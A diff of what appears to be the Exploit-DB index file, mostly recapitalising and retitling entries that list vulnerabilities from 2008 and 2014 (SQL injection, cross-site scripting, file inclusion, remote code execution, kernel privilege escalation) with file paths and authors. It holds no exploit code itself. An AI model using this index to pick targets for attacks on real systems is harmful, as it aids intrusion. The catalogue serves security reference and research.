- 'recipeid' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0 31288,platforms/php/webapps/31288.txt,"Joomla! and Mambo 'com_hello_world' Component - 'id' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0 31289,platforms/php/webapps/31289.txt,"PHP-Nuke Gallery 1.3 Module - 'artid' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0 @@ -28188,8 +28189,8 @@ id,file,description,date,author,platform,type,port 31297,platforms/php/webapps/31297.txt,"PHP-Nuke Sell Module - 'cid' Parameter SQL Injection",2008-02-25,"Aria-Security Team",php,webapps,0 31298,platforms/hardware/remote/31298.txt,"Packeteer PacketShaper and PolicyCenter 8.2.2 - 'FILELIST' Parameter Cross-Site Scripting",2008-02-25,nnposter,hardware,remote,0 31299,platforms/jsp/webapps/31299.txt,"Alkacon OpenCMS 7.0.3 - 'tree_files.jsp' Cross-Site Scripting",2008-02-25,nnposter,jsp,webapps,0 -31300,platforms/windows/dos/31300.txt,"SurgeMail and WebMail 3.0 - 'Page' Command Remote Format String",2008-02-25,"Luigi Auriemma",windows,dos,0 -31301,platforms/windows/dos/31301.txt,"SurgeMail 3.0 - Real CGI executables Remote Buffer Overflow",2008-02-25,"Luigi Auriemma",windows,dos,0 +31300,platforms/windows/dos/31300.txt,"Surgemail and WebMail 3.0 - 'Page' Command Remote Format String",2008-02-25,"Luigi Auriemma",windows,dos,0 +31301,platforms/windows/dos/31301.txt,"Surgemail 3.0 - Real CGI executables Remote Buffer Overflow",2008-02-25,"Luigi Auriemma",windows,dos,0 31302,platforms/windows/dos/31302.txt,"SurgeFTP 2.3a2 - 'Content-Length' Parameter NULL Pointer Denial Of Service",2008-02-25,"Luigi Auriemma",windows,dos,0 31303,platforms/php/webapps/31303.txt,"Joomla! and Mambo 'com_inter' Component - 'id' Parameter SQL Injection",2008-02-25,The-0utl4w,php,webapps,0 31304,platforms/php/webapps/31304.txt,"Plume CMS 1.2.2 - 'manager/xmedia.php' Cross-Site Scripting",2008-02-21,"Omer Singer",php,webapps,0 @@ -28202,19 +28203,19 @@ id,file,description,date,author,platform,type,port 31314,platforms/asp/webapps/31314.txt,"Flicks Software AuthentiX 6.3b1 - 'username' Parameter Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"William Hicks",asp,webapps,0 31315,platforms/php/webapps/31315.txt,"XRms 1.99.2 - CRM 'msg' Parameter Cross-Site Scripting",2008-02-28,vijayv,php,webapps,0 31316,platforms/php/webapps/31316.txt,"Centreon 1.4.2 - color_picker.php Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"Julien CAYSSOL",php,webapps,0 -31317,platforms/php/webapps/31317.txt,"netOffice Dwins 1.3 - Authentication Bypass / Arbitrary File Upload",2008-02-29,RawSecurity.org,php,webapps,0 +31317,platforms/php/webapps/31317.txt,"NetOffice Dwins 1.3 - Authentication Bypass / Arbitrary File Upload",2008-02-29,RawSecurity.org,php,webapps,0 31318,platforms/php/webapps/31318.txt,"Centreon 1.4.2.3 - 'index.php' Local File Inclusion",2008-02-29,JosS,php,webapps,0 31319,platforms/php/webapps/31319.txt,"Simple PHP Scripts Gallery 0.x - 'index.php' Cross-Site Scripting",2008-02-29,ZoRLu,php,webapps,0 31320,platforms/php/webapps/31320.txt,"PHPMyTourney 2 - tourney/index.php Remote File Inclusion",2008-02-29,"HACKERS PAL",php,webapps,0 31321,platforms/php/webapps/31321.txt,"Heathco Software h2desk - Multiple Information Disclosure Vulnerabilities",2008-03-01,joseph.giron13,php,webapps,0 -31322,platforms/php/webapps/31322.txt,"PHP-Nuke Johannes Hass 'gaestebuch 2.2 Module - 'id' Parameter SQL Injection",2008-03-01,TurkishWarriorr,php,webapps,0 +31322,platforms/php/webapps/31322.txt,"PHP-Nuke Johannes Hass 'Gaestebuch 2.2 Module - 'id' Parameter SQL Injection",2008-03-01,TurkishWarriorr,php,webapps,0 31323,platforms/windows/dos/31323.c,"ADI Convergence Galaxy FTP Server Password - Remote Denial of Service",2008-03-01,"Maks M",windows,dos,0 31324,platforms/php/webapps/31324.txt,"KC Wiki 1.0 - minimal/wiki.php page Parameter Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0 31325,platforms/php/webapps/31325.txt,"KC Wiki 1.0 - simplest/wiki.php page Parameter Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0 31326,platforms/php/webapps/31326.txt,"Flyspray 0.9.9 - Information Disclosure/HTML Injection / Cross-Site Scripting",2008-03-03,"Digital Security Research Group",php,webapps,0 31327,platforms/multiple/dos/31327.txt,"Borland StarTeam 2008 10.0.57 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",multiple,dos,0 31328,platforms/php/webapps/31328.txt,"TorrentTrader 1.08 - 'msg' Parameter HTML Injection",2008-03-03,Dominus,php,webapps,0 -31329,platforms/multiple/webapps/31329.txt,"MediaWiki 1.22.1 PdfHandler - Remote Code Execution Exploit",2014-02-01,@u0x,multiple,webapps,0 +31329,platforms/multiple/webapps/31329.txt,"MediaWiki 1.22.1 PdfHandler - Remote Code Execution",2014-02-01,@u0x,multiple,webapps,0 31337,platforms/php/webapps/31337.txt,"WebCT 4.1.5 - Email and Discussion Board Messages HTML Injection",2007-06-25,Lupton,php,webapps,0 31338,platforms/windows/dos/31338.txt,"Perforce Server 2007.3 - Multiple Remote Denial of Service Vulnerabilities",2008-03-05,"Luigi Auriemma",windows,dos,0 31339,platforms/php/webapps/31339.txt,"PHP-Nuke Yellow_Pages Module - 'cid' Parameter SQL Injection",2008-03-05,ZoRLu,php,webapps,0 @@ -28223,7 +28224,7 @@ id,file,description,date,author,platform,type,port 31342,platforms/hardware/remote/31342.txt,"Airspan ProST WiMAX Device - Web Interface Authentication Bypass",2008-03-06,"Francis Lacoste-Cordeau",hardware,remote,0 31343,platforms/multiple/dos/31343.txt,"Sun Java Runtime Environment 1.x - Image Parsing Heap Buffer Overflow",2008-03-06,"Chris Evans",multiple,dos,0 31344,platforms/php/webapps/31344.pl,"PHP-Nuke KutubiSitte Module - 'kid' Parameter SQL Injection",2008-03-06,r080cy90r,php,webapps,0 -31345,platforms/windows/remote/31345.txt,"MicroWorld eScan Server 9.0.742 - Directory Traversal",2008-03-06,"Luigi Auriemma",windows,remote,0 +31345,platforms/windows/remote/31345.txt,"Microworld eScan Server 9.0.742 - Directory Traversal",2008-03-06,"Luigi Auriemma",windows,remote,0 31346,platforms/linux/local/31346.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write Exploit (2)",2014-02-02,saelo,linux,local,0 31347,platforms/linux/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Privilege Escalation (3)",2014-02-02,rebel,linux,local,0 31529,platforms/php/webapps/31529.txt,"Joomla! and Mambo Cinema Component 1.0 - 'id' Parameter SQL Injection",2008-03-23,S@BUN,php,webapps,0 @@ -28233,14 +28234,14 @@ id,file,description,date,author,platform,type,port 31353,platforms/php/webapps/31353.txt,"ImageVue 1.7 - dir2.php path Parameter Cross-Site Scripting",2008-03-07,ZoRLu,php,webapps,0 31354,platforms/php/webapps/31354.txt,"ImageVue 1.7 - upload.php path Parameter Cross-Site Scripting",2008-03-07,ZoRLu,php,webapps,0 31355,platforms/php/webapps/31355.txt,"ImageVue 1.7 - dirxml.php path Parameter Cross-Site Scripting",2008-03-07,ZoRLu,php,webapps,0 -31356,platforms/php/webapps/31356.txt,"Wordpress 2.3.2 - wp-admin/users.php inviteemail Parameter Cross-Site Scripting",2008-03-07,Doz,php,webapps,0 -31357,platforms/php/webapps/31357.txt,"Wordpress 2.3.2 - wp-admin/invites.php to Parameter Cross-Site Scripting",2008-03-07,Doz,php,webapps,0 +31356,platforms/php/webapps/31356.txt,"WordPress 2.3.2 - wp-admin/users.php inviteemail Parameter Cross-Site Scripting",2008-03-07,Doz,php,webapps,0 +31357,platforms/php/webapps/31357.txt,"WordPress 2.3.2 - wp-admin/invites.php to Parameter Cross-Site Scripting",2008-03-07,Doz,php,webapps,0 31358,platforms/php/webapps/31358.txt,"Specimen Image Database - taxonservice.php dir Parameter Remote File Inclusion",2008-03-07,ZoRLu,php,webapps,0 -31359,platforms/windows/remote/31359.html,"Microsoft Internet Explorer 7.0 - Combined JavaScript and XML Remote Information Disclosure",2008-03-07,"Ronald van den Heetkamp",windows,remote,0 +31359,platforms/windows/remote/31359.html,"Microsoft Internet Explorer 7 - Combined JavaScript and XML Remote Information Disclosure",2008-03-07,"Ronald van den Heetkamp",windows,remote,0 31360,platforms/windows/dos/31360.txt,"MailEnable 3.13 - IMAP Service Multiple Remote Vulnerabilities",2008-03-07,"Luigi Auriemma",windows,dos,0 31361,platforms/windows/dos/31361.txt,"Microsoft Office 2000/2003/2004/XP - File Memory Corruption",2008-03-07,anonymous,windows,dos,0 31362,platforms/multiple/remote/31362.txt,"Neptune Web Server 3.0 - 404 Error Page Cross-Site Scripting",2008-03-07,NetJackal,multiple,remote,0 -31363,platforms/windows/dos/31363.txt,"Panda Internet Security/Antivirus+Firewall 2008 - CPoint.sys Memory Corruption",2008-03-08,"Tobias Klein",windows,dos,0 +31363,platforms/windows/dos/31363.txt,"Panda Internet Security/AntiVirus+Firewall 2008 - CPoint.sys Memory Corruption",2008-03-08,"Tobias Klein",windows,dos,0 31364,platforms/hardware/remote/31364.txt,"F5 BIG-IP 9.4.3 - Web Management Interface Console HTML Injection",2008-03-08,nnposter,hardware,remote,0 31365,platforms/php/webapps/31365.txt,"Alkacon OpenCMS 7.0.3 - logfileViewSettings.jsp filePath Parameter Cross-Site Scripting",2008-03-08,nnposter,php,webapps,0 31366,platforms/php/webapps/31366.txt,"Alkacon OpenCMS 7.0.3 - logfileViewSettings.jsp filePath.0 Parameter Arbitrary File Access",2008-03-08,nnposter,php,webapps,0 @@ -28276,7 +28277,7 @@ id,file,description,date,author,platform,type,port 31696,platforms/windows/dos/31696.txt,"Computer Associates eTrust Secure Content Manager 8.0 - 'eCSqdmn' Remote Denial of Service",2008-04-22,"Luigi Auriemma",windows,dos,0 31697,platforms/php/webapps/31697.txt,"Horde Webmail 1.0.6 - 'addevent.php' Cross-Site Scripting",2008-04-23,"Aria-Security Team",php,webapps,0 31698,platforms/hardware/remote/31698.txt,"F5 Networks FirePass 4100 SSL VPN - 'installControl.php3' Cross-Site Scripting",2008-04-23,"Alberto Cuesta Partida",hardware,remote,0 -31699,platforms/windows/remote/31699.txt,"RSA Authentication Agent for Web 5.3 - URI Redirection",2008-04-23,"Richard Brain",windows,remote,0 +31699,platforms/windows/remote/31699.txt,"RSA Authentication Agent for Web 5.3 - URI redirection",2008-04-23,"Richard Brain",windows,remote,0 31461,platforms/windows/dos/31461.txt,"Publish-It 3.6d - Buffer Overflow",2014-02-06,"Core Security",windows,dos,0 31399,platforms/windows/dos/31399.txt,"McAfee Framework ePolicy 3.x - Orchestrator '_naimcomn_Log' Remote Format String",2008-03-12,"Luigi Auriemma",windows,dos,0 31400,platforms/php/webapps/31400.txt,"XOOPS MyTutorials Module 2.1 - 'printpage.php' SQL Injection",2008-03-12,S@BUN,php,webapps,0 @@ -28288,10 +28289,10 @@ id,file,description,date,author,platform,type,port 31406,platforms/php/webapps/31406.txt,"SNewsCMS 2.x - 'search.php' Cross-Site Scripting",2008-03-17,medprostuda.ru,php,webapps,0 31407,platforms/windows/remote/31407.txt,"MG-SOFT Net Inspector 6.5.0.826 - Multiple Remote Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote,0 31408,platforms/php/webapps/31408.txt,"Cfnetgs 0.24 - 'index.php' Cross-Site Scripting",2008-03-17,ZoRLu,php,webapps,0 -31409,platforms/windows/remote/31409.txt,"BootManage TFTP Server 1.99 - 'filename' Remote Buffer Overflow",2008-03-17,"Luigi Auriemma",windows,remote,0 +31409,platforms/windows/remote/31409.txt,"BootManage TFTP Server 1.99 - 'Filename' Remote Buffer Overflow",2008-03-17,"Luigi Auriemma",windows,remote,0 31410,platforms/php/webapps/31410.txt,"Joomla! and Mambo 'com_guide' Component - 'category' Parameter SQL Injection",2008-03-17,The-0utl4w,php,webapps,0 31411,platforms/cgi/webapps/31411.txt,"RSA WebID 5.3 - 'IISWebAgentIF.dll' Cross-Site Scripting",2008-03-17,quentin.berdugo,cgi,webapps,0 -31412,platforms/osx/remote/31412.txt,"Apple Mac OSX Server 10.5 - Wiki Server Directory Traversal",2008-03-17,"Rodrigo Carvalho",osx,remote,0 +31412,platforms/osx/remote/31412.txt,"Apple Mac OS X Server 10.5 - Wiki Server Directory Traversal",2008-03-17,"Rodrigo Carvalho",osx,remote,0 31413,platforms/asp/webapps/31413.txt,"Imperva SecureSphere 5.0 - Cross-Site Scripting",2008-03-17,Berezniski,asp,webapps,0 31414,platforms/php/webapps/31414.txt,"phpStats 0.1_alpha - 'phpStats.php' Cross-Site Scripting",2008-03-18,"Hanno Boeck",php,webapps,0 31415,platforms/php/webapps/31415.txt,"eForum 0.4 - 'busca.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-18,Omni,php,webapps,0 @@ -28301,17 +28302,17 @@ id,file,description,date,author,platform,type,port 31420,platforms/php/webapps/31420.txt,"Eventy Online Scheduler 1.8 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80 31421,platforms/php/webapps/31421.txt,"Booking Calendar - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80 31423,platforms/windows/webapps/31423.txt,"IBM Business Process Manager - User Account Reconfiguration",2014-02-05,0in,windows,webapps,0 -31424,platforms/php/webapps/31424.txt,"Wordpress Dandelion Theme - Arbitry File Upload",2014-02-05,TheBlackMonster,php,webapps,80 +31424,platforms/php/webapps/31424.txt,"WordPress Dandelion Theme - Arbitry File Upload",2014-02-05,TheBlackMonster,php,webapps,80 31425,platforms/hardware/webapps/31425.txt,"D-Link DIR-100 - Multiple Vulnerabilities",2014-02-05,"Felix Richter",hardware,webapps,80 31426,platforms/php/webapps/31426.txt,"Plogger 1.0 (RC1) - Multiple Vulnerabilities",2014-02-05,killall-9,php,webapps,80 31427,platforms/php/webapps/31427.txt,"ownCloud 6.0.0a - Multiple Vulnerabilities",2014-02-05,absane,php,webapps,80 -31429,platforms/multiple/dos/31429.py,"VLC 2.1.2 - (.asf) Crash (PoC)",2014-02-05,Saif,multiple,dos,0 +31429,platforms/multiple/dos/31429.py,"VLC 2.1.2 - '.asf' Crash (PoC)",2014-02-05,Saif,multiple,dos,0 31430,platforms/hardware/webapps/31430.txt,"Inteno DG301 - Command Injection",2014-02-05,"Juan J. Guelfo",hardware,webapps,80 31431,platforms/php/webapps/31431.txt,"ImpressCMS 1.3.5 - Multiple Vulnerabilities",2014-02-05,"Pedro Ribeiro",php,webapps,80 -31432,platforms/linux/remote/31432.rb,"SkyBlueCanvas CMS - Remote Code Execution",2014-02-05,Metasploit,linux,remote,0 +31432,platforms/linux/remote/31432.rb,"Skybluecanvas CMS - Remote Code Execution",2014-02-05,Metasploit,linux,remote,0 31433,platforms/multiple/remote/31433.rb,"Apache Tomcat Manager - Application Upload Authenticated Code Execution",2014-02-05,Metasploit,multiple,remote,80 31434,platforms/java/remote/31434.rb,"Apache Struts - Developer Mode OGNL Execution",2014-02-05,Metasploit,java,remote,8080 -31435,platforms/php/webapps/31435.py,"Joomla JomSocial Component 2.6 - Code Execution Exploit",2014-02-05,"Matias Fontanini",php,webapps,80 +31435,platforms/php/webapps/31435.py,"Joomla JomSocial Component 2.6 - Code Execution",2014-02-05,"Matias Fontanini",php,webapps,80 31436,platforms/php/webapps/31436.txt,"Pandora Fms 5.0RC1 - Remote Command Injection",2014-02-05,xistence,php,webapps,80 31438,platforms/java/webapps/31438.txt,"IBM Rational ClearQuest 7.0 - Multiple Parameters Multiple Cross-Site Scripting Vulnerabilities",2008-03-19,sasquatch,java,webapps,0 31439,platforms/php/webapps/31439.txt,"cPanel 11.18.3 - List Directories and Folders Information Disclosure",2008-03-18,Linux_Drox,php,webapps,0 @@ -28320,8 +28321,8 @@ id,file,description,date,author,platform,type,port 31442,platforms/asp/webapps/31442.txt,"Iatek PortalApp 4.0 - 'links.asp' SQL Injection",2008-03-19,xcorpitx,asp,webapps,0 31443,platforms/php/webapps/31443.txt,"CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting",2008-03-19,sasquatch,php,webapps,0 31444,platforms/linux/dos/31444.txt,"MySQL 5.1.13 - INFORMATION_SCHEMA Remote Denial Of Service",2007-12-05,"Masaaki HIROSE",linux,dos,0 -31445,platforms/jsp/webapps/31445.txt,"Elastic Path 4.1 - manager/getImportFileRedirect.jsp file Parameter Traversal Arbitrary File Access",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 -31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 - manager/fileManager.jsp dir Variable Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 +31445,platforms/jsp/webapps/31445.txt,"Elastic Path 4.1 - 'manager/getImportFileRedirect.jsp' file Parameter Traversal Arbitrary File Access",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 +31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 - 'manager/FileManager.jsp' dir Variable Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 31447,platforms/php/webapps/31447.txt,"News-Template 0.5beta - 'print.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-20,ZoRLu,php,webapps,0 31448,platforms/php/webapps/31448.txt,"Joomla! and Mambo Datsogallery 1.3.1 Component - 'id' Parameter SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0 31449,platforms/php/webapps/31449.txt,"W-Agora 4.0 - add_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 @@ -28349,8 +28350,8 @@ id,file,description,date,author,platform,type,port 31479,platforms/php/remote/31479.txt,"Quick Classifieds 1.0 - index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,remote,0 31480,platforms/php/webapps/31480.txt,"Quick Classifieds 1.0 - locate.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31481,platforms/php/webapps/31481.txt,"Quick Classifieds 1.0 - search_results.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31482,platforms/php/webapps/31482.txt,"Quick Classifieds 1.0 - classifieds/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31483,platforms/php/webapps/31483.txt,"Quick Classifieds 1.0 - classifieds/view.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31482,platforms/php/webapps/31482.txt,"Quick Classifieds 1.0 - Classifieds/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31483,platforms/php/webapps/31483.txt,"Quick Classifieds 1.0 - Classifieds/view.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31484,platforms/php/webapps/31484.txt,"Quick Classifieds 1.0 - controlcenter/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31485,platforms/php/webapps/31485.txt,"Quick Classifieds 1.0 - controlcenter/manager.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31486,platforms/php/webapps/31486.txt,"Quick Classifieds 1.0 - controlcenter/pass.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 @@ -28382,7 +28383,7 @@ id,file,description,date,author,platform,type,port 31512,platforms/php/webapps/31512.txt,"Quick Classifieds 1.0 - include/adminHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31513,platforms/php/webapps/31513.txt,"Quick Classifieds 1.0 - include/usersHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31514,platforms/php/webapps/31514.txt,"Quick Classifieds 1.0 - style/default.scheme.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31515,platforms/php/webapps/31515.txt,"osCommerce 2.3.3.4 - (geo_zones.php zID parameter) SQL Injection",2014-02-07,"Ahmed Aboul-Ela",php,webapps,80 +31515,platforms/php/webapps/31515.txt,"osCommerce 2.3.3.4 - (geo_zones.php zID Parameter) SQL Injection",2014-02-07,"Ahmed Aboul-Ela",php,webapps,80 31516,platforms/php/webapps/31516.txt,"Serendipity 1.7.5 (Backend) - Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",php,webapps,80 31517,platforms/php/webapps/31517.txt,"CTERA 3.2.29.0 / 3.2.42.0 - Persistent Cross-Site Scripting",2014-02-07,"Luigi Vezzoso",php,webapps,80 31518,platforms/linux/remote/31518.rb,"Pandora Fms - Remote Code Execution",2014-02-07,Metasploit,linux,remote,8023 @@ -28395,11 +28396,11 @@ id,file,description,date,author,platform,type,port 31527,platforms/hardware/webapps/31527.nse,"ZTE ZXV10 W300 Router - Hardcoded Credentials",2014-02-09,"Cesar Neira",hardware,webapps,80 31532,platforms/php/webapps/31532.txt,"Clever Copy 3.0 - 'postview.php' SQL Injection",2008-03-25,U238,php,webapps,0 31533,platforms/novell/remote/31533.txt,"Novell eDirectory 8.x - eMBox Utility 'edirutil' Command Unspecified",2008-03-25,"Nicholas Gregorie",novell,remote,0 -31534,platforms/windows/remote/31534.html,"LeadTools Multimedia 15 - 'LTMM15.dll' ActiveX Control Arbitrary File Overwrite Vulnerabilities",2008-03-25,shinnai,windows,remote,0 +31534,platforms/windows/remote/31534.html,"LeadTools MultiMedia 15 - 'LTMM15.dll' ActiveX Control Arbitrary File Overwrite Vulnerabilities",2008-03-25,shinnai,windows,remote,0 31535,platforms/php/webapps/31535.txt,"phpBB PJIRC Module 0.5 - 'irc.php' Local File Inclusion",2008-03-25,0in,php,webapps,0 31536,platforms/windows/remote/31536.txt,"File Transfer 1.2 - Request File Directory Traversal",2007-11-10,teeed,windows,remote,0 -31537,platforms/cgi/webapps/31537.txt,"Blackboard Academic Suite 6/7 - webapps/blackboard/execute/viewCatalog searchText Parameter Cross-Site Scripting",2008-03-26,Knight4vn,cgi,webapps,0 -31538,platforms/cgi/webapps/31538.txt,"Blackboard Academic Suite 6/7 - bin/common/announcement.pl data__announcements___pk1_pk2__subject Parameter Cross-Site Scripting",2008-03-26,Knight4vn,cgi,webapps,0 +31537,platforms/cgi/webapps/31537.txt,"BlackBoard Academic Suite 6/7 - webapps/BlackBoard/execute/viewCatalog searchText Parameter Cross-Site Scripting",2008-03-26,Knight4vn,cgi,webapps,0 +31538,platforms/cgi/webapps/31538.txt,"BlackBoard Academic Suite 6/7 - bin/common/announcement.pl data__announcements___pk1_pk2__subject Parameter Cross-Site Scripting",2008-03-26,Knight4vn,cgi,webapps,0 31539,platforms/php/webapps/31539.txt,"PHPAddressBook 2.0 - 'index.php' SQL Injection",2008-03-26,"Virangar Security",php,webapps,0 31540,platforms/linux/remote/31540.php,"PECL 3.0.x - Alternative PHP Cache Extension 'apc_search_paths()' Buffer Overflow",2008-03-26,dannyp,linux,remote,0 31541,platforms/php/webapps/31541.html,"Invision Power Board 2.x - 'Signature' iFrame Security",2008-03-26,SHAHEE_MIRZA,php,webapps,0 @@ -28427,23 +28428,23 @@ id,file,description,date,author,platform,type,port 31562,platforms/windows/remote/31562.txt,"2X ThinClientServer 5.0 sp1-r3497 TFTP Service - Directory Traversal",2008-03-29,"Luigi Auriemma",windows,remote,0 31563,platforms/windows/dos/31563.txt,"SLMail Pro 6.3.1.0 - Multiple Remote Denial Of Service / Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0 31564,platforms/php/webapps/31564.txt,"Jack (tR) Jax LinkLists 1.00 - 'jax_linklists.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 -31565,platforms/php/webapps/31565.txt,"@lex GuestBook 4.0.5 - setup.php language_setup Parameter Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 -31566,platforms/php/webapps/31566.txt,"@lex GuestBook 4.0.5 - 'index.php' test Parameter Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 +31565,platforms/php/webapps/31565.txt,"@lex Guestbook 4.0.5 - setup.php language_setup Parameter Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 +31566,platforms/php/webapps/31566.txt,"@lex Guestbook 4.0.5 - 'index.php' test Parameter Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 31567,platforms/php/webapps/31567.txt,"@lex Poll 1.2 - 'setup.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 31568,platforms/php/webapps/31568.txt,"PHP Classifieds 6.20 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities",2008-03-31,ZoRLu,php,webapps,0 31569,platforms/hardware/webapps/31569.txt,"D-Link DSL-2750B ADSL Router - Cross-Site Request Forgery",2014-02-11,killall-9,hardware,webapps,80 -31570,platforms/php/webapps/31570.txt,"Wordpress Frontend Upload Plugin - Arbitrary File Upload",2014-02-11,"Daniel Godoy",php,webapps,80 -31571,platforms/php/webapps/31571.txt,"Wordpress Buddypress Plugin 1.9.1 - Privilege Escalation",2014-02-11,"Pietro Oliva",php,webapps,80 +31570,platforms/php/webapps/31570.txt,"WordPress Frontend Upload Plugin - Arbitrary File Upload",2014-02-11,"Daniel Godoy",php,webapps,80 +31571,platforms/php/webapps/31571.txt,"WordPress BuddyPress Plugin 1.9.1 - Privilege Escalation",2014-02-11,"Pietro Oliva",php,webapps,80 32215,platforms/php/webapps/32215.txt,"RMSOFT Downloads Plus - (rmdp) 1.5/1.7 Module for XOOPS search.php key Parameter Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 32216,platforms/php/webapps/32216.txt,"RMSOFT Downloads Plus - (rmdp) 1.5/1.7 Module for XOOPS down.php id Parameter Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 31573,platforms/ios/webapps/31573.txt,"WiFi Camera Roll 1.2 iOS - Multiple Vulnerabilities",2014-02-11,Vulnerability-Lab,ios,webapps,8880 31574,platforms/arm/local/31574.c,"Linux Kernel < 3.4.5 (ARM Android 4.2.2 / 4.4) - Privilege Escalation",2014-02-11,"Piotr Szerman",arm,local,0 31575,platforms/windows/remote/31575.rb,"KingScada - kxClientDownload.ocx ActiveX Remote Code Execution",2014-02-11,Metasploit,windows,remote,0 -31576,platforms/windows/local/31576.rb,"Windows - TrackPopupMenuEx Win32k NULL Page",2014-02-11,Metasploit,windows,local,0 +31576,platforms/windows/local/31576.rb,"Microsoft Windows - TrackPopupMenuEx Win32k NULL Page",2014-02-11,Metasploit,windows,local,0 31577,platforms/unix/remote/31577.rb,"Kloxo - SQL Injection / Remote Code Execution",2014-02-11,Metasploit,unix,remote,7778 31578,platforms/windows/webapps/31578.txt,"Tableau Server - Blind SQL Injection",2014-02-11,"Trustwave's SpiderLabs",windows,webapps,80 31579,platforms/windows/webapps/31579.txt,"Titan FTP Server 10.32 Build 1816 - Directory Traversal",2014-02-11,"Fara Rustein",windows,webapps,0 -31580,platforms/php/webapps/31580.txt,"Jax GuestBook 3.31/3.50 - 'jax_guestbook.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 +31580,platforms/php/webapps/31580.txt,"Jax Guestbook 3.31/3.50 - 'jax_Guestbook.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 31581,platforms/php/webapps/31581.txt,"PHPGKit 0.9 - 'connexion.php' Remote File Inclusion",2008-03-31,ZoRLu,php,webapps,0 31582,platforms/asp/webapps/31582.txt,"EfesTECH Video 5.0 - 'catID' Parameter SQL Injection",2008-03-31,RMx,asp,webapps,0 31583,platforms/windows/remote/31583.txt,"Microsoft Crypto API X.509 Certificate Validation - Remote Information Disclosure",2008-03-31,"Alexander Klink",windows,remote,0 @@ -28476,7 +28477,7 @@ id,file,description,date,author,platform,type,port 31611,platforms/php/webapps/31611.txt,"RobotStats 0.1 - robotstats.inc.php DOCUMENT_ROOT Parameter Remote File Inclusion",2008-04-04,ZoRLu,php,webapps,0 31613,platforms/osx/remote/31613.ics,"Apple iCal 3.0.1 - 'COUNT' Parameter Integer Overflow",2008-04-21,"Core Security Technologies",osx,remote,0 31614,platforms/php/webapps/31614.txt,"Tiny Portal 1.0 - 'shouts' Cross-Site Scripting",2008-04-04,Y433r,php,webapps,0 -31615,platforms/multiple/dos/31615.rb,"Apache Commons FileUpload and Apache Tomcat - Denial-of-Service",2014-02-12,"Trustwave's SpiderLabs",multiple,dos,0 +31615,platforms/multiple/dos/31615.rb,"Apache Commons FileUpload and Apache Tomcat - Denial of Service",2014-02-12,"Trustwave's SpiderLabs",multiple,dos,0 31616,platforms/php/webapps/31616.txt,"Web Server Creator 0.1 - 'langfile' Parameter Remote File Inclusion",2008-04-04,ZoRLu,php,webapps,0 31617,platforms/hardware/webapps/31617.txt,"NetGear DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",hardware,webapps,0 31618,platforms/ios/webapps/31618.txt,"jDisk (stickto) 2.0.3 iOS - Multiple Vulnerabilities",2014-02-12,Vulnerability-Lab,ios,webapps,0 @@ -28485,7 +28486,7 @@ id,file,description,date,author,platform,type,port 31621,platforms/java/webapps/31621.txt,"Sun Java System Messenger Express 6.1-13-15 - 'sid' Cross-Site 